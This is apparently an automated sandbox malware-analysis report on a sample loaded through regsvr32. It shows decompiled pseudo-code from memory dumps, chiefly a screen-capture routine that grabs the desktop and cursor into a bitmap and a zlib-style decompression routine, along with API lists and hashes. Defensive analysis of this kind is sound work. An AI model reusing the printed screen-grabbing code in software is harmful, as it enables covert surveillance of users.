						_a8 = _a8 & 0x00000000;
						if(_t39[2] > 0) {
							_t31 = _t39[3];
							_t22 = _a4 + 0x24;
							_v12 = _a4 + 0x24;
							_v8 = _t39[3];
							while(E0316A236(_t22,  *_t31) != 0) {
								_t26 = _a8 + 1;
								_t31 = _v8 + 4;
								_a8 = _t26;
								_t22 = _v12;
								_v8 = _v8 + 4;
								if(_t26 < _t39[2]) {
									continue;
								} else {
								}
								goto L8;
							}
							 *_t36 =  *_t36 |  *_t39;
						}
						L8:
						_t39 =  &(_t39[4]);
						_t28 = _t28 - 1;
					} while (_t28 != 0);
				}
				Sleep(0xa);
				return 1;
			}









            0x0316daf5
            0x0316daf6
            0x0316daf9
            0x0316dafc
            0x0316db01
            0x0316db04
            0x0316db07
            0x0316db07
            0x0316db0f
            0x0316db14
            0x0316db17
            0x0316db1a
            0x0316db1d
            0x0316db20
            0x0316db33
            0x0316db34
            0x0316db37
            0x0316db3d
            0x0316db40
            0x0316db43
            0x00000000
            0x00000000
            0x0316db45
            0x00000000
            0x0316db43
            0x0316db49
            0x0316db49
            0x0316db4b
            0x0316db4b
            0x0316db4e
            0x0316db4e
            0x0316db53
            0x0316db5b
            0x0316db67

            APIs
            • Sleep.KERNELBASE(0000000A), ref: 0316DB5B
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: Sleep
            • String ID:
            • API String ID: 3472027048-0
            • Opcode ID: e83c2ce7c4c5b9b0ffb6cf622e20ae9705da0a153e3f5cf890ced7ddc6877279
            • Instruction ID: 50b4f966d2a26b1bc90cff73dbbec3e8f909b8e4624a98234e1ba869ed5d3094
            • Opcode Fuzzy Hash: e83c2ce7c4c5b9b0ffb6cf622e20ae9705da0a153e3f5cf890ced7ddc6877279
            • Instruction Fuzzy Hash: 55111771A00305AFEB14CFA9D484AA9B7F8FF4A224F14846DE95A9B344D370E9A1CB50
            Uniqueness

            Uniqueness Score: -1.00%

            Non-executed Functions

            Function 03165D1E Relevance: 35.2, APIs: 18, Strings: 2, Instructions: 223windowCOMMON
            Download Yara Rule
            C-Code - Quality: 98%
            			E03165D1E(int* __ecx) {
				signed int _v8;
				char _v12;
				int _v16;
				struct HWND__* _v20;
				struct HWND__* _v24;
				struct HDC__* _v28;
				void* _v32;
				int* _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				void* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				short _v82;
				short _v84;
				signed int _v88;
				signed int _v92;
				struct tagBITMAPINFO _v96;
				intOrPtr _v102;
				int _v110;
				char _v112;
				void* _v116;
				void* _v120;
				void* _v124;
				void* _v132;
				void* _v136;
				void* _v140;
				int _v156;
				signed int _v160;
				void _v164;
				int _t82;
				void* _t84;
				signed int _t92;
				void* _t99;
				char _t103;
				intOrPtr _t113;
				int* _t114;
				struct HDC__* _t120;
				signed int _t124;
				short _t137;
				struct HDC__* _t141;
				void* _t144;
				void* _t148;

				_v36 = __ecx;
				_v24 = 0;
				_t120 = 0;
				_v12 = 0;
				_t144 = 0;
				_v20 = 0;
				_t141 = GetDC(0);
				_v28 = _t141;
				if(_t141 != 0) {
					_t120 = CreateCompatibleDC(_t141);
					if(_t120 != 0) {
						_v8 = GetDeviceCaps(_t141, 8);
						_t82 = GetDeviceCaps(_t141, 0xa);
						_v16 = _t82;
						_t144 = CreateCompatibleBitmap(_t141, _v8, _t82);
						if(_t144 != 0) {
							_t84 = SelectObject(_t120, _t144);
							_v32 = _t84;
							if(_t84 != 0) {
								_t144 = SelectObject(_t120, _v32);
								if(_t144 != 0) {
									GetObjectW(_t144, 0x18,  &_v164);
									_t92 = _v160;
									_t124 = _v156;
									_v92 = _t92;
									_v84 = 1;
									_t137 = 0x20;
									_v82 = _t137;
									_v96.bmiHeader = 0x28;
									_v80 = 0;
									_v76 = 0;
									_v72 = 0;
									_v68 = 0;
									_v64 = 0;
									_v60 = 0;
									asm("cdq");
									_v88 = _t124;
									_v8 = ((_t92 << 5) + 0x1f >> 5) * _t124 << 2;
									_t99 = E03168DC9(((_t92 << 5) + 0x1f >> 5) * _t124 << 2);
									_v20 = _t99;
									if(_t99 != 0) {
										GetDIBits(_t120, _t144, 0, _v156, _t99,  &_v96, 0);
										_v16 = _v8 + 0x36;
										_t103 = E03168DC9(_v8 + 0x36);
										_v12 = _t103;
										if(_t103 != 0) {
											_v110 = _v16;
											_v112 = 0x4d42;
											_v102 = 0x36;
											E03168EA6(_t103,  &_v112, 0xe);
											E03168EA6(_v12 + 0xe,  &_v96, 0x28);
											E03168EA6(_v12 + 0x36, _v20, _v8);
											_t148 = _t148 + 0x24;
											_v8 = _v8 & 0x00000000;
											_t113 = E0316FBFB(_v12, _v16,  &_v8);
											_v24 = _t113;
											if(_t113 != 0) {
												_t114 = _v36;
												if(_t114 != 0) {
													 *_t114 = _v8;
												}
											}
										}
									}
								}
							}
						}
					}
				}
				E03168DDF( &_v20, 0);
				E03168DDF( &_v12, 0);
				if(_t120 != 0) {
					DeleteDC(_t120);
				}
				if(_t141 != 0) {
					DeleteDC(_t141);
				}
				if(_t144 != 0) {
					DeleteObject(_t144);
				}
				return _v24;
			}




















































            0x03165d2a
            0x03165d30
            0x03165d33
            0x03165d35
            0x03165d38
            0x03165d3a
            0x03165d43
            0x03165d45
            0x03165d4a
            0x03165d57
            0x03165d5b
            0x03165d6f
            0x03165d72
            0x03165d78
            0x03165d82
            0x03165d86
            0x03165d8e
            0x03165d94
            0x03165d99
            0x03165e2f
            0x03165e33
            0x03165e43
            0x03165e49
            0x03165e51
            0x03165e58
            0x03165e5b
            0x03165e64
            0x03165e65
            0x03165e6e
            0x03165e75
            0x03165e78
            0x03165e7b
            0x03165e7e
            0x03165e81
            0x03165e84
            0x03165e87
            0x03165e8b
            0x03165e9a
            0x03165e9d
            0x03165ea2
            0x03165ea8
            0x03165ebf
            0x03165ecc
            0x03165ecf
            0x03165ed4
            0x03165eda
            0x03165edf
            0x03165ee7
            0x03165ef2
            0x03165ef9
            0x03165f0e
            0x03165f23
            0x03165f31
            0x03165f34
            0x03165f39
            0x03165f3e
            0x03165f44
            0x03165f46
            0x03165f4b
            0x03165f50
            0x03165f50
            0x03165f4b
            0x03165f44
            0x03165eda
            0x03165ea8
            0x03165e33
            0x03165d99
            0x03165d86
            0x03165d5b
            0x03165f58
            0x03165f63
            0x03165f6d
            0x03165f70
            0x03165f70
            0x03165f78
            0x03165f7b
            0x03165f7b
            0x03165f83
            0x03165f86
            0x03165f86
            0x03165f93

            APIs
            • GetDC.USER32(00000000), ref: 03165D3D
            • CreateCompatibleDC.GDI32(00000000), ref: 03165D51
            • GetDeviceCaps.GDI32(00000000,00000008), ref: 03165D6A
            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 03165D72
            • CreateCompatibleBitmap.GDI32(00000000,?,00000000), ref: 03165D7C
            • SelectObject.GDI32(00000000,00000000), ref: 03165D8E
            • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 03165DB2
            • GetCursorInfo.USER32(?), ref: 03165DC3
            • CopyIcon.USER32 ref: 03165DD8
            • GetIconInfo.USER32(00000000,?), ref: 03165DE6
            • GetObjectW.GDI32(?,00000018,?), ref: 03165E04
            • DrawIconEx.USER32 ref: 03165E1C
            • SelectObject.GDI32(00000000,?), ref: 03165E29
            • GetObjectW.GDI32(00000000,00000018,?), ref: 03165E43
            • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000028,00000000), ref: 03165EBF
            • DeleteDC.GDI32(00000000), ref: 03165F70
            • DeleteDC.GDI32(00000000), ref: 03165F7B
            • DeleteObject.GDI32(00000000), ref: 03165F86
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: Object$DeleteIcon$CapsCompatibleCreateDeviceInfoSelect$BitmapBitsCopyCursorDraw
            • String ID: ($6
            • API String ID: 192358524-4149066357
            • Opcode ID: 695915fb7b3f136d0e5a918ff4b12aae79ef08a035979b2339222bebfa18cbdb
            • Instruction ID: d27d3414db8bb74b535fa05462435d9d7eb8698156137f459216fa18edb387cb
            • Opcode Fuzzy Hash: 695915fb7b3f136d0e5a918ff4b12aae79ef08a035979b2339222bebfa18cbdb
            • Instruction Fuzzy Hash: 23811AB5D00219ABDB24DBE4DC49BAEBBBDFF49300F148069E504F7244EB309A55CB60
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0317676F Relevance: 8.1, Strings: 6, Instructions: 577COMMONCrypto
            Download Yara Rule
            C-Code - Quality: 81%
            			E0317676F(void* __edi) {
				signed int _t164;
				unsigned int _t172;
				unsigned int _t173;
				signed int _t174;
				signed int _t176;
				signed int _t178;
				signed int _t179;
				signed int _t182;
				signed int _t184;
				unsigned int _t185;
				int _t186;
				int _t194;
				signed char _t200;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				int _t210;
				int _t222;
				signed int _t227;
				signed int _t235;
				signed int _t251;
				signed char _t252;
				unsigned int _t253;
				signed char _t254;
				signed int* _t255;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int _t266;
				intOrPtr _t271;
				signed char _t278;
				signed int _t279;
				char* _t280;
				signed int _t282;
				signed char _t284;
				signed int _t287;
				signed int _t291;
				int _t292;
				int _t293;
				int _t296;
				int _t298;
				int _t302;
				signed int _t305;
				signed char _t311;
				signed char _t312;
				signed char _t315;
				signed char _t316;
				signed int _t318;
				int _t319;
				int _t320;
				signed char _t322;
				int _t324;
				int _t326;
				int _t330;
				signed int _t333;
				signed char _t336;
				signed char _t337;
				signed char _t339;
				int _t341;
				signed int _t347;
				int _t349;
				intOrPtr _t350;
				intOrPtr _t351;
				unsigned int _t356;
				unsigned int _t361;
				signed int _t364;
				signed int _t365;
				intOrPtr _t367;
				void* _t368;
				intOrPtr* _t380;
				void* _t381;
				intOrPtr* _t389;
				void* _t390;
				signed int _t395;
				void* _t396;
				signed int _t397;
				void* _t403;
				void* _t405;
				intOrPtr* _t412;
				void* _t413;
				signed int _t414;
				void* _t416;
				intOrPtr* _t423;
				void* _t424;
				unsigned int _t430;
				signed int _t431;
				void* _t434;
				signed int* _t435;
				void* _t439;

				 *((intOrPtr*)(__edi + 0x56))();
				asm("pushfd");
				_t435 = _t434 - 0x40;
				asm("cld");
				_t395 = _t435[0x16];
				_t367 =  *((intOrPtr*)(_t395 + 0x1c));
				_t164 =  *_t395;
				_t435[0xb] = _t164;
				_t435[5] =  *((intOrPtr*)(_t395 + 4)) + _t164 - 0xb;
				_t271 =  *((intOrPtr*)(_t395 + 0x10));
				_t251 =  *(_t395 + 0xc);
				_t435[0xf] = _t251;
				_t435[0xa] =  ~(_t435[0x17] - _t271) + _t251;
				_t435[4] = _t271 - 0x101 + _t251;
				_t435[2] =  *(_t367 + 0x4c);
				_t435[3] =  *(_t367 + 0x50);
				 *_t435 = (1 <<  *(_t367 + 0x54)) - 1;
				_t435[1] = (1 <<  *(_t367 + 0x58)) - 1;
				_t172 =  *(_t367 + 0x28);
				_t347 =  *(_t367 + 0x34);
				_t435[0xd] = _t172;
				_t435[0xc] =  *(_t367 + 0x30);
				_t435[0xe] = _t347;
				_t430 =  *(_t367 + 0x38);
				_t252 =  *(_t367 + 0x3c);
				_t396 = _t435[0xb];
				_t278 = _t435[5];
				if(_t278 > _t396) {
					L2:
					if((_t396 & 0x00000003) != 0) {
						_t396 = _t396 + 1;
						_t278 = _t252;
						_t252 = _t252 + 8;
						_t172 = 0 << _t278;
						_t430 = _t430 | _t172;
						goto L2;
					}
					goto L4;
				} else {
					_t341 = _t278 + 0xb - _t396;
					_t172 = memset(_t396 + _t341 + _t341, 0, memcpy( &(_t435[7]), _t396, _t341) << 0);
					_t435 =  &(_t435[6]);
					_t278 = 0;
					_t396 =  &(_t435[7]);
					_t435[5] = _t396;
					L4:
					_t368 = _t435[0xf];
					while(1) {
						_t439 =  *0x317e040 - 2;
						if(_t439 == 0) {
							break;
						}
						if(_t439 > 0) {
							do {
								if(_t252 <= 0xf) {
									asm("lodsw");
									_t322 = _t252;
									_t252 = _t252 + 0x10;
									_t430 = _t431 | 0 << _t322;
								}
								_t173 =  *(_t435[2] + ( *_t435 & _t430) * 4);
								while(1) {
									_t253 = _t252 - _t173;
									_t431 = _t430 >> _t173;
									if(_t173 == 0) {
										asm("stosb");
										goto L22;
									}
									_t356 = _t173 >> 0x10;
									_t311 = _t173;
									if((_t173 & 0x00000010) == 0) {
										if((_t173 & 0x00000040) != 0) {
											L97:
											if((_t173 & 0x00000020) == 0) {
												_t280 = "invalid literal/length code";
												_t350 = 0x1a;
											} else {
												_t280 = 0;
												_t350 = 0xb;
											}
											L101:
											_t174 = _t435[0x16];
											if(_t280 != 0) {
												 *(_t174 + 0x18) = _t280;
											}
											 *((intOrPtr*)( *((intOrPtr*)(_t174 + 0x1c)))) = _t350;
											goto L104;
										}
										_t173 =  *(_t435[2] + (((0x00000001 << _t311) - 0x00000001 & _t431) + _t356) * 4);
										continue;
									}
									_t312 = _t311 & 0x0000000f;
									if(_t312 != 0) {
										if(_t253 < _t312) {
											asm("lodsw");
											_t339 = _t253;
											_t253 = _t253 + 0x10;
											_t431 = _t431 | 0 << _t339;
											_t312 = _t339;
										}
										_t253 = _t253 - _t312;
										_t235 = (0x00000001 << _t312) - 0x00000001 & _t431;
										_t431 = _t431 >> _t312;
										_t356 = _t356 + _t235;
									}
									_t435[6] = _t356;
									if(_t253 <= 0xf) {
										asm("lodsw");
										_t337 = _t253;
										_t253 = _t253 + 0x10;
										_t431 = _t431 | 0 << _t337;
									}
									_t200 =  *(_t435[3] + (_t435[1] & _t431) * 4);
									while(1) {
										_t361 = _t200 >> 0x10;
										_t253 = _t253 - _t200;
										_t431 = _t431 >> _t200;
										_t315 = _t200;
										if((_t200 & 0x00000010) != 0) {
											break;
										}
										if((_t200 & 0x00000040) != 0) {
											L96:
											_t280 = "invalid distance code";
											_t350 = 0x1a;
											goto L101;
										}
										_t200 =  *(_t435[3] + (((0x00000001 << _t315) - 0x00000001 & _t431) + _t361) * 4);
									}
									_t316 = _t315 & 0x0000000f;
									if(_t316 == 0) {
										if(_t361 != 1 || _t435[0xa] == _t368) {
											L38:
											_t435[0xb] = _t396;
											_t207 = _t368 - _t435[0xa];
											if(_t207 < _t361) {
												_t208 = _t435[0xd];
												_t318 =  ~_t207;
												_t414 = _t435[0xe];
												if(_t208 < _t361) {
													L100:
													_t396 = _t435[0xb];
													_t280 = "invalid distance too far back";
													_t350 = 0x1a;
													goto L101;
												}
												_t319 = _t318 + _t361;
												if(_t435[0xc] != 0) {
													_t209 = _t435[0xc];
													if(_t319 <= _t209) {
														_t416 = _t414 + _t209 - _t319;
														_t210 = _t435[6];
														if(_t210 > _t319) {
															_t210 = memcpy(_t368, _t416, _t319);
															_t435 =  &(_t435[3]);
															_t368 = _t416 + _t319 + _t319;
															_t416 = _t368 - _t361;
														}
													} else {
														_t416 = _t414 + _t435[0xd] + _t209 - _t319;
														_t324 = _t319 - _t209;
														_t210 = _t435[6];
														if(_t210 > _t324) {
															_t210 = memcpy(_t368, _t416, _t324);
															_t435 =  &(_t435[3]);
															_t368 = _t416 + _t324 + _t324;
															_t416 = _t435[0xe];
															_t326 = _t435[0xc];
															if(_t210 > _t326) {
																_t210 = memcpy(_t368, _t416, _t326);
																_t435 =  &(_t435[3]);
																_t368 = _t416 + _t326 + _t326;
																_t416 = _t368 - _t361;
															}
														}
													}
												} else {
													_t416 = _t414 + _t208 - _t319;
													_t210 = _t435[6];
													if(_t210 > _t319) {
														_t210 = memcpy(_t368, _t416, _t319);
														_t435 =  &(_t435[3]);
														_t368 = _t416 + _t319 + _t319;
														_t416 = _t368 - _t361;
													}
												}
												_t320 = _t210;
												memcpy(_t368, _t416, _t320);
												_t435 =  &(_t435[3]);
												_t368 = _t416 + _t320 + _t320;
												_t396 = _t435[0xb];
												goto L22;
											}
											_t423 = _t368 - _t361;
											_t330 = _t435[6] - 3;
											 *_t368 =  *_t423;
											_t424 = _t423 + 3;
											 *((char*)(_t368 + 1)) =  *((intOrPtr*)(_t423 + 1));
											 *((char*)(_t368 + 2)) =  *((intOrPtr*)(_t423 + 2));
											memcpy(_t368 + 3, _t424, _t330);
											_t435 =  &(_t435[3]);
											_t368 = _t424 + _t330 + _t330;
											_t396 = _t435[0xb];
										} else {
											_t389 = _t368 - 1;
											_t222 =  *_t389;
											_t333 = _t435[6] - 3;
											 *(_t389 + 1) = _t222;
											 *(_t389 + 2) = _t222;
											 *(_t389 + 3) = _t222;
											_t390 = _t389 + 4;
											memset(_t390, _t222, _t333 << 0);
											_t435 =  &(_t435[3]);
											_t368 = _t390 + _t333;
										}
										goto L22;
									}
									if(_t253 < _t316) {
										asm("lodsw");
										_t336 = _t253;
										_t253 = _t253 + 0x10;
										_t431 = _t431 | 0 << _t336;
										_t316 = _t336;
									}
									_t253 = _t253 - _t316;
									_t227 = (0x00000001 << _t316) - 0x00000001 & _t431;
									_t431 = _t431 >> _t316;
									_t361 = _t361 + _t227;
									goto L38;
								}
								L22:
							} while (_t435[4] > _t368 && _t435[5] > _t396);
							L104:
							if( *0x317e040 == 2) {
								_t253 = _t431;
							}
							_t176 = _t435[0x16];
							_t351 =  *((intOrPtr*)(_t176 + 0x1c));
							_t282 = _t253 >> 3;
							_t397 = _t396 - _t282;
							_t254 = _t253 - (_t282 << 3);
							 *(_t176 + 0xc) = _t368;
							 *(_t351 + 0x3c) = _t254;
							_t284 = _t254;
							_t255 =  &(_t435[7]);
							if(_t435[5] == _t255) {
								_t266 =  *_t176;
								_t435[5] = _t266;
								_t397 = _t397 - _t255 + _t266;
								_t435[5] = _t435[5] +  *((intOrPtr*)(_t176 + 4)) - 0xb;
							}
							 *_t176 = _t397;
							_t258 = (1 << _t284) - 1;
							if( *0x317e040 == 2) {
								asm("psrlq mm0, mm1");
								asm("movd ebp, mm0");
								asm("emms");
							}
							 *(_t351 + 0x38) = _t431 & _t258;
							_t259 = _t435[5];
							if(_t259 <= _t397) {
								 *((intOrPtr*)(_t176 + 4)) =  ~(_t397 - _t259) + 0xb;
							} else {
								 *((intOrPtr*)(_t176 + 4)) = _t259 - _t397 + 0xb;
							}
							_t260 = _t435[4];
							if(_t260 <= _t368) {
								 *((intOrPtr*)(_t176 + 0x10)) =  ~(_t368 - _t260) + 0x101;
							} else {
								 *((intOrPtr*)(_t176 + 0x10)) = _t260 - _t368 + 0x101;
							}
							asm("popfd");
							return _t176;
						}
						_push(_t172);
						_push(_t252);
						_push(_t278);
						_push(_t347);
						asm("pushfd");
						 *_t435 =  *_t435 ^ 0x00200000;
						asm("popfd");
						asm("pushfd");
						_pop(_t364);
						_t365 = _t364 ^  *_t435;
						if(_t365 == 0) {
							L15:
							 *0x317e040 = 3;
							L16:
							_pop(_t347);
							_pop(_t278);
							_pop(_t252);
							_pop(_t172);
							continue;
						}
						asm("cpuid");
						if(_t252 != 0x756e6547 || _t278 != 0x6c65746e || _t365 != 0x49656e69) {
							goto L15;
						} else {
							asm("cpuid");
							if(0xd != 6 || (_t365 & 0x00800000) == 0) {
								goto L15;
							} else {
								 *0x317e040 = 2;
								goto L16;
							}
						}
					}
					asm("emms");
					asm("movd mm0, ebp");
					_t431 = _t252;
					asm("movd mm4, dword [esp]");
					asm("movq mm3, mm4");
					asm("movd mm5, dword [esp+0x4]");
					asm("movq mm2, mm5");
					asm("pxor mm1, mm1");
					_t253 = _t435[2];
					do {
						asm("psrlq mm0, mm1");
						if(_t431 <= 0x20) {
							asm("movd mm6, ebp");
							asm("movd mm7, dword [esi]");
							_t396 = _t396 + 4;
							asm("psllq mm7, mm6");
							_t431 = _t431 + 0x20;
							asm("por mm0, mm7");
						}
						asm("pand mm4, mm0");
						asm("movd eax, mm4");
						asm("movq mm4, mm3");
						_t173 =  *(_t253 + _t172 * 4);
						while(1) {
							_t279 = _t173 & 0x000000ff;
							asm("movd mm1, ecx");
							_t431 = _t431 - _t279;
							if(_t173 == 0) {
								break;
							}
							_t349 = _t173 >> 0x10;
							if((_t173 & 0x00000010) == 0) {
								if((_t173 & 0x00000040) != 0) {
									goto L97;
								}
								asm("psrlq mm0, mm1");
								asm("movd ecx, mm0");
								_t173 =  *(_t253 + ((_t279 &  *(0x31766ec + (_t173 & 0x0000000f) * 4)) + _t349) * 4);
								continue;
							}
							_t178 = _t173 & 0x0000000f;
							if(_t178 != 0) {
								asm("psrlq mm0, mm1");
								asm("movd mm1, eax");
								asm("movd ecx, mm0");
								_t431 = _t431 - _t178;
								_t349 = _t349 + (_t279 &  *(0x31766ec + _t178 * 4));
							}
							asm("psrlq mm0, mm1");
							if(_t431 <= 0x20) {
								asm("movd mm6, ebp");
								asm("movd mm7, dword [esi]");
								_t396 = _t396 + 4;
								asm("psllq mm7, mm6");
								_t431 = _t431 + 0x20;
								asm("por mm0, mm7");
							}
							asm("pand mm5, mm0");
							asm("movd eax, mm5");
							asm("movq mm5, mm2");
							_t179 =  *(_t435[3] + _t178 * 4);
							while(1) {
								_t287 = _t179 & 0x000000ff;
								_t253 = _t179 >> 0x10;
								_t431 = _t431 - _t287;
								asm("movd mm1, ecx");
								if((_t179 & 0x00000010) != 0) {
									break;
								}
								if((_t179 & 0x00000040) != 0) {
									goto L96;
								}
								asm("psrlq mm0, mm1");
								asm("movd ecx, mm0");
								_t179 =  *(_t435[3] + ((_t287 &  *(0x31766ec + (_t179 & 0x0000000f) * 4)) + _t253) * 4);
							}
							_t182 = _t179 & 0x0000000f;
							if(_t182 == 0) {
								if(_t253 != 1 || _t435[0xa] == _t368) {
									L76:
									_t435[0xb] = _t396;
									_t184 = _t368 - _t435[0xa];
									if(_t184 < _t253) {
										_t185 = _t435[0xd];
										_t291 =  ~_t184;
										_t403 = _t435[0xe];
										if(_t185 < _t253) {
											goto L100;
										}
										_t292 = _t291 + _t253;
										if(_t435[0xc] != 0) {
											_t186 = _t435[0xc];
											if(_t292 <= _t186) {
												_t405 = _t403 + _t186 - _t292;
												if(_t349 > _t292) {
													_t349 = _t349 - _t292;
													memcpy(_t368, _t405, _t292);
													_t435 =  &(_t435[3]);
													_t368 = _t405 + _t292 + _t292;
													_t405 = _t368 - _t253;
												}
											} else {
												_t405 = _t403 + _t435[0xd] + _t186 - _t292;
												_t296 = _t292 - _t186;
												if(_t349 > _t296) {
													_t349 = _t349 - _t296;
													memcpy(_t368, _t405, _t296);
													_t435 =  &(_t435[3]);
													_t368 = _t405 + _t296 + _t296;
													_t405 = _t435[0xe];
													_t298 = _t435[0xc];
													if(_t349 > _t298) {
														_t349 = _t349 - _t298;
														memcpy(_t368, _t405, _t298);
														_t435 =  &(_t435[3]);
														_t368 = _t405 + _t298 + _t298;
														_t405 = _t368 - _t253;
													}
												}
											}
										} else {
											_t405 = _t403 + _t185 - _t292;
											if(_t349 > _t292) {
												_t349 = _t349 - _t292;
												memcpy(_t368, _t405, _t292);
												_t435 =  &(_t435[3]);
												_t368 = _t405 + _t292 + _t292;
												_t405 = _t368 - _t253;
											}
										}
										_t293 = _t349;
										_t172 = memcpy(_t368, _t405, _t293);
										_t435 =  &(_t435[3]);
										_t368 = _t405 + _t293 + _t293;
										_t396 = _t435[0xb];
										_t253 = _t435[2];
										goto L64;
									}
									_t412 = _t368 - _t253;
									_t302 = _t349 - 3;
									 *_t368 =  *_t412;
									_t413 = _t412 + 3;
									 *((char*)(_t368 + 1)) =  *((intOrPtr*)(_t412 + 1));
									 *((char*)(_t368 + 2)) =  *((intOrPtr*)(_t412 + 2));
									_t172 = memcpy(_t368 + 3, _t413, _t302);
									_t435 =  &(_t435[3]);
									_t368 = _t413 + _t302 + _t302;
									_t396 = _t435[0xb];
									_t253 = _t435[2];
									goto L64;
								} else {
									_t380 = _t368 - 1;
									_t194 =  *_t380;
									_t305 = _t349 - 3;
									 *(_t380 + 1) = _t194;
									 *(_t380 + 2) = _t194;
									 *(_t380 + 3) = _t194;
									_t381 = _t380 + 4;
									_t172 = memset(_t381, _t194, _t305 << 0);
									_t435 =  &(_t435[3]);
									_t368 = _t381 + _t305;
									_t253 = _t435[2];
									L64:
									if(_t435[4] <= _t368) {
										goto L104;
									}
									goto L65;
								}
							}
							asm("psrlq mm0, mm1");
							asm("movd mm1, eax");
							asm("movd ecx, mm0");
							_t431 = _t431 - _t182;
							_t253 = _t253 + (_t287 &  *(0x31766ec + _t182 * 4));
							goto L76;
						}
						_t172 = _t173 >> 0x10;
						asm("stosb");
						goto L64;
						L65:
					} while (_t435[5] > _t396);
					goto L104;
				}
			}




























































































            0x0317676f
            0x03176774
            0x03176775
            0x03176778
            0x03176779
            0x0317677d
            0x03176783
            0x0317678a
            0x0317678e
            0x03176796
            0x03176799
            0x031767aa
            0x031767ae
            0x031767b2
            0x031767bc
            0x031767c0
            0x031767cf
            0x031767dd
            0x031767e1
            0x031767e7
            0x031767ea
            0x031767ee
            0x031767f2
            0x031767f6
            0x031767f9
            0x031767fc
            0x03176800
            0x03176806
            0x0317682a
            0x03176830
            0x03176836
            0x03176837
            0x03176839
            0x0317683c
            0x0317683e
            0x00000000
            0x0317683e
            0x00000000
            0x03176808
            0x0317680b
            0x0317681e
            0x0317681e
            0x0317681e
            0x03176820
            0x03176824
            0x03176842
            0x03176842
            0x03176846
            0x03176846
            0x0317684d
            0x00000000
            0x00000000
            0x03176853
            0x031768c0
            0x031768c3
            0x031768c7
            0x031768c9
            0x031768cb
            0x031768d0
            0x031768d0
            0x031768db
            0x031768de
            0x031768e0
            0x031768e2
            0x031768e6
            0x031768eb
            0x031768eb
            0x031768eb
            0x03176903
            0x03176906
            0x0317690a
            0x03176a06
            0x03176d1a
            0x03176d1c
            0x03176d2a
            0x03176d2f
            0x03176d1e
            0x03176d1e
            0x03176d23
            0x03176d23
            0x03176d46
            0x03176d46
            0x03176d4c
            0x03176d4e
            0x03176d4e
            0x03176d54
            0x00000000
            0x03176d54
            0x03176a1c
            0x00000000
            0x03176a1c
            0x03176910
            0x03176913
            0x03176917
            0x0317691d
            0x0317691f
            0x03176921
            0x03176926
            0x03176928
            0x03176928
            0x03176932
            0x03176934
            0x03176936
            0x03176938
            0x03176938
            0x0317693a
            0x03176941
            0x03176945
            0x03176947
            0x03176949
            0x0317694e
            0x0317694e
            0x0317695a
            0x0317695d
            0x0317695f
            0x03176964
            0x03176966
            0x03176968
            0x0317696c
            0x00000000
            0x00000000
            0x03176a26
            0x03176d0e
            0x03176d0e
            0x03176d13
            0x00000000
            0x03176d13
            0x03176a3c
            0x03176a3c
            0x03176972
            0x03176975
            0x031769df
            0x0317699e
            0x0317699e
            0x031769a4
            0x031769aa
            0x03176a46
            0x03176a4a
            0x03176a4c
            0x03176a52
            0x03176d36
            0x03176d36
            0x03176d3a
            0x03176d3f
            0x00000000
            0x03176d3f
            0x03176a58
            0x03176a5f
            0x03176a85
            0x03176a8b
            0x03176abb
            0x03176abd
            0x03176ac3
            0x03176ac7
            0x03176ac7
            0x03176ac7
            0x03176acb
            0x03176acb
            0x03176a8d
            0x03176a93
            0x03176a95
            0x03176a97
            0x03176a9d
            0x03176aa1
            0x03176aa1
            0x03176aa1
            0x03176aa3
            0x03176aa7
            0x03176aad
            0x03176ab1
            0x03176ab1
            0x03176ab1
            0x03176ab5
            0x03176ab5
            0x03176aad
            0x03176a9d
            0x03176a61
            0x03176a63
            0x03176a65
            0x03176a6b
            0x03176a6f
            0x03176a6f
            0x03176a6f
            0x03176a73
            0x03176a73
            0x03176a6b
            0x03176acd
            0x03176acf
            0x03176acf
            0x03176acf
            0x03176ad1
            0x00000000
            0x03176ad1
            0x031769b6
            0x031769b8
            0x031769bd
            0x031769c5
            0x031769c8
            0x031769cb
            0x031769d1
            0x031769d1
            0x031769d1
            0x031769d3
            0x031769e7
            0x031769e7
            0x031769ec
            0x031769ee
            0x031769f1
            0x031769f4
            0x031769f7
            0x031769fa
            0x031769fd
            0x031769fd
            0x031769fd
            0x031769fd
            0x00000000
            0x031769df
            0x03176979
            0x0317697f
            0x03176981
            0x03176983
            0x03176988
            0x0317698a
            0x0317698a
            0x03176994
            0x03176996
            0x03176998
            0x0317699a
            0x00000000
            0x0317699a
            0x031768ec
            0x031768ec
            0x03176d58
            0x03176d5f
            0x03176d61
            0x03176d61
            0x03176d63
            0x03176d69
            0x03176d6c
            0x03176d6f
            0x03176d74
            0x03176d76
            0x03176d79
            0x03176d7c
            0x03176d7e
            0x03176d86
            0x03176d8a
            0x03176d8c
            0x03176d90
            0x03176d98
            0x03176d98
            0x03176d9c
            0x03176da5
            0x03176dad
            0x03176daf
            0x03176db2
            0x03176db5
            0x03176db5
            0x03176db9
            0x03176dbc
            0x03176dc2
            0x03176dd5
            0x03176dc4
            0x03176dc9
            0x03176dc9
            0x03176dd8
            0x03176dde
            0x03176df7
            0x03176de0
            0x03176de8
            0x03176de8
            0x03176dfd
            0x03176e02
            0x03176e02
            0x03176855
            0x03176856
            0x03176857
            0x03176858
            0x03176859
            0x0317685d
            0x03176864
            0x03176865
            0x03176866
            0x03176867
            0x03176869
            0x031768af
            0x031768af
            0x031768b9
            0x031768b9
            0x031768ba
            0x031768bb
            0x031768bc
            0x00000000
            0x031768bc
            0x0317686d
            0x03176875
            0x00000000
            0x03176887
            0x0317688c
            0x03176897
